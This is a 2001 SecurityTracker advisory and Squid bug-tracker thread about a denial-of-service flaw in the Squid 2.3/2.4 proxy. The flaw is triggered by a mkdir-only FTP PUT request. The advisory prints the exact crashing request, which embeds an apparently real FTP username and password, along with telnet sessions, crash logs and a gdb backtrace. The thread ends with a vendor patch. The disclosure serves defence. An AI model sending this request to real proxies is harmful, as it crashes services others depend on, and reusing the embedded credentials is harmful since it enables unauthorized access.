SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Squid Vendors:   [Multiple Authors/Vendors]
Squid Proxy Caching Server Can Be Crashed by Remote Users with Mkdir PUT Requests
SecurityTracker Alert ID:  1002439
SecurityTracker URL:  http://securitytracker.com/id/1002439
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 21 2001
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.3 and 2.4 series
Description:   A denial of service vulnerability was reported in the Squid proxy caching server. A remote user can cause the proxy caching service to crash.

The following type of request that requires a directory to be created will cause the Squid proxy to crash:

PUT ftp://cgi-lexus:yGDgX9@[ftpserveraddress]/WEB-INF/1/2/1/ HTTP/1.1

The following log messages will be created as a result of this type of command:

Sep 10 14:17:11 azimuth (squid): xstrdup: tried to dup a NULL pointer!
Sep 10 14:17:11 azimuth squid[3027]: Squid Parent: child process 12742 exited due to signal 6
Sep 10 14:17:14 azimuth squid[3027]: Squid Parent: child process 12745 started

It is reported that the process will reload within a few seconds and return to normal operation.

Impact:   A remote user can cause the Squid proxy to crash.
Solution:   The vendor has released a fix. The latest version can be obtained from the vendor's web site:

http://www.squid-cache.org/

Vendor URL:  www.squid-cache.org/bugs/show_bug.cgi?id=233 (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Linux (Any), UNIX (Any)
Underlying OS Comments:  Tested on RedHat 6.2 and 7.1.

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Debian Issues Fix) Squid Proxy Caching Server Can Be Crashed by Remote Users with Mkdir PUT Requests
The vendor has released a fix.
(Conectiva Issues Fix) Squid Proxy Caching Server Can Be Crashed by Remote Users with Mkdir PUT Requests
The vendor has released a fix.
(Red Hat Issues Fix) Squid Proxy Caching Server Can Be Crashed by Remote Users with Mkdir PUT Requests
The vendor has released a fix.
(Red Hat Issues Fix) Squid Proxy Caching Server Can Be Crashed by Remote Users with Mkdir PUT Requests
The vendor has released a fix.
(SuSE Issues Fix) Squid Proxy Caching Server Can Be Crashed by Remote Users with Mkdir PUT Requests
The vendor has released a fix.
(Mandrake Issues Fix) Squid Proxy Caching Server Can Be Crashed by Remote Users with Mkdir PUT Requests
The vendor has released a fix.
(Turbolinux Issues Fix) Squid Proxy Caching Server Can Be Crashed by Remote Users with Mkdir PUT Requests
The vendor has released a fix.
(FreeBSD Issues Fix) Squid Proxy Caching Server Can Be Crashed by Remote Users with Mkdir PUT Requests
The vendor has released a fix.
(Caldera Issues Fix for OpenLinux) Squid Proxy Caching Server Can Be Crashed by Remote Users with Mkdir PUT Requests
The vendor has released a fix for OpenLinux.



 Source Message Contents

Subject:  squid DoS


Dear All,

I'd like to inform about a DoS bug I recently found in SQUID regarding
handling of mkdir-only PUT requests - please look at
http://www.squid-cache.org/bugs/show_bug.cgi?id=233 for more info.
>From my testing, it applies both to Squid 2.3 and 2.4 series. Tested on
RedHat 6.2 and 7.1.

This bug has been fixed by SQUID developers on Sep 18 and has been known
for about two weeks - I think its time to inform Bugtraq.

--
Best Regards
Vladimir Ivaschenko
Certified Linux Engineer (RHCE)
http://www.hazard.maks.net/


------------------------------------------------------------
From http://www.squid-cache.org/bugs/show_bug.cgi?id=233

I'm running SQUID-2.4STABLE1 on RedHat 6.2 and started to receive squid crashes
(it reloads after a few seconds). I narrowed the problem down, one of our users
started to use FAR with FAR Navigator plugin to upload to a free webhosting
site. Essentially, if you do the following request:

$ telnet proxy:3128
PUT ftp://cgi-lexus:yGDgX9@ftp.mycgiserver.com/WEB-INF/1/2/1/ HTTP/1.1
Content-type: application/octet-stream
Content-length: 0
Pragma: no-cache



Connection closed by foreign host.

The squid will crash:

$ telnet proxy:3128
Trying proxy...
telnet: Unable to connect to remote host: Connection refused

The following message will appear in the log:

Sep 10 14:17:11 azimuth (squid): xstrdup: tried to dup a NULL pointer!
Sep 10 14:17:11 azimuth squid[3027]: Squid Parent: child process 12742 exited
due to signal 6
Sep 10 14:17:14 azimuth squid[3027]: Squid Parent: child process 12745 started

OS is RedHat 6.2, squid is compiled from SRPM for RedHat 7.1. The same also
happened while I was running SQUID-2.3, actually that's what prompted me to
upgrade to SQUID-2.4. I didn't find any core files. I tried setting up my own
FTP server and couldn't force the same error. However it should be easy to
duplicate the error by issuing the request above, to exactly same FTP server. I
tried on two different proxy servers running RH 6.2 and same squid versions (2.3
and 2.4) and could duplicate the error.



------- Additional Comments From hazard@francoudi.com 2001-09-11 00:56 -------

I checked on another machine with SQUID 2.3STABLE4 with the same result. Please
note that in some modified telnet versions send some additional characters in
the beginning, and its better to use netcat for testing the vulnerability.



------- Additional Comments From Robert Collins 2001-09-12 02:51 -------

Try Squid 2.4 stable 2, and see if the bug is fixed there. If the bug is still
prsent, please get a backtrace.



------- Additional Comments From hazard@francoudi.com 2001-09-12 03:32 -------

Ok, I get the same error with SQUID2.4STABLE2:

[hazard@hazard hazard]$ telnet localhost 3128
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
PUT ftp://cgi-lexus:yGDgX9@ftp.mycgiserver.com/WEB-INF/1/2/1/ HTTP/1.1
Content-type: application/octet-stream
Content-length: 0
Pragma: no-cache


Connection closed by foreign host.
[hazard@hazard hazard]$ telnet localhost 3128
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused

How do I get a backtrace if it doesn't leave a core? I think it would be easier
for you to repeat the request in your own environment.



------- Additional Comments From hazard@francoudi.com 2001-09-12 06:45 -------

I checked both 2.4STABLE1 and 2.4STABLE2 on RedHat 7.1 and observe the same
results.



------- Additional Comments From hazard@francoudi.com 2001-09-12 07:11 -------

Ok, my backtrace:

Program received signal SIGABRT, Aborted.
0x400c4d21 in __kill () from /lib/libc.so.6
(gdb) bt
#0  0x400c4d21 in __kill () from /lib/libc.so.6
#1  0x400581f7 in raise (sig=6) at signals.c:65
#2  0x400c60b8 in abort () at ../sysdeps/generic/abort.c:88
#3  0x80940f3 in fatal_dump ()
#4  0x80ab088 in xstrdup ()
#5  0x806c30a in ftpSendReply ()
#6  0x806b5b8 in ftpSendStor ()
#7  0x806b4ee in ftpRestOrList ()
#8  0x806b086 in ftpPasvCallback ()
#9  0x805da08 in commConnectCallback ()
#10 0x805dd28 in commConnectHandle ()
#11 0x805f896 in comm_poll ()
#12 0x807bdfd in main ()
#13 0x400be9cb in __libc_start_main (main=0x807ba74 <main>, argc=3, 
    argv=0xbffffb24, init=0x8049ec0 <_init>, fini=0x80ae69c <_fini>, 
    rtld_fini=0x4000ae60 <_dl_fini>, stack_end=0xbffffb1c)
    at ../sysdeps/generic/libc-start.c:92


Squid was built with the following:

%configure \
   --exec_prefix=/usr --bindir=/usr/sbin --libexecdir=/usr/lib/squid \
   --localstatedir=/var --sysconfdir=/etc/squid \
   --enable-poll --enable-snmp --enable-removal-policies="heap,lru" \
   --enable-storeio="aufs,coss,diskd,ufs" \
   --enable-delay-pools --enable-linux-netfilter \
   --enable-htcp --enable-carp --with-pthreads \
   --enable-auth-modules="LDAP,NCSA,PAM,SMB,MSNT"



------- Additional Comments From hazard@francoudi.com 2001-09-12 07:20 -------

Just in case, backtrace was did via gdb running squid -X -N



------- Additional Comments From hazard@francoudi.com 2001-09-13 06:22 -------

Any news? I think this is a very critical bug, if it is a bug.



------- Additional Comments From Henrik Nordstrom 2001-09-18 07:53 -------

Created an attachment (id=38)
Fix "mkdir-only" PUT requests



------- Additional Comments From Henrik Nordstrom 2001-09-18 07:56 -------

Patch tested and committed.


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC